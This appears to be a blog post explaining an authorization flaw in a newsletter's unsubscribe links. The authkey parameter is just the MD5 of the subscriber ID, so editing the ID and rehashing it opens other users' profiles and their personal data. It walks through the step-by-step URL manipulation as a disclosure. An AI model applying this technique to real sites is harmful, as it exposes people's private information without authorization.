HTTP Parameter Pollution

Using a typical newsletter you receive from a local association as an example, we can scroll down to the bottom of an e-mail where a standard “Unsubscribe” hyperlink might be included:

Looking closer at the URL, there are a few parameters that immediately stand out:

https://www.example.org/manage-subscriptions/?method=unsubscribe&wpmlhistory_id=99&wpmlsubscriber_id=870&wpmlmailinglist_id=1&authkey=22fb0cee7e1f3bde58293de743871417

It is reasonable to assume that the wpmlsubscriber_id is a unique user ID (UID) that is linked to the subscription account (perhaps we are the 870th subscriber?). To test this theory, let’s register for the same newsletter using a different e-mail. The confirmation e-mail received includes a hyperlink that looks like the following:

https://www.example.org/?newsletters_link=57874d6e4…4ee33d5a3f&subscriber_id=1243

Opening a private browser to ensure we are logged out of everything, let’s craft the original “Unsubscribe” hyperlink with one minor difference: the value of wpmlsubscriber_id is changed from 870 to our new one, 1243. A wall presents itself:

Next, let’s turn our the attention to that last parameter of the “Unsubscribe” URL: authkey=22fb0cee7e1f3bde58293de743871417. Because this parameter is so aptly named, it is safe to assume this value is linked to the unique user ID and is used as method of authentication. With a quick Google search, it is evident that this value is simply the hash of the number 870 (the original UID) using MD5.

With this information, we can change the URL once more (keeping the value wpmlsubscriber_id=1243) but updating the authkey parameter to equal the value generated by running the number 1243 through an MD5 hash generator (simplified mathematically: authkey = MD5(x) where x is the target UID number). With the hashed target UID, the updated URL looks like the following:

https://www.example.org/manage-subscriptions/?method=unsubscribe&wpmlhistory_id=99&wpmlsubscriber_id=1243&wpmlmailinglist_id=1&authkey=e1d5be1c7f2f456670de3d53c7b54f4a

The page loads and it appears that we have bypassed the authorization wall and are placed directly into the target’s subscription management page:

From here we can click through into a fully logged in account using the “Manage Subscriptions” link, where we have access to all of the information uploaded to the profile (including the user’s full name, address, and telephone number).

In this scenario, the simple process of changing the value for the parameter wpmlsubscriber_id (representing a user’s ID) and updating the value for the parameter authkey with a corresponding MD5 hash of that UID number, one can access anyone in the association’s user database, control their subscription preferences, and glean any personal information that may be linked to that profile.

Leave a Reply

Your email address will not be published. Required fields are marked *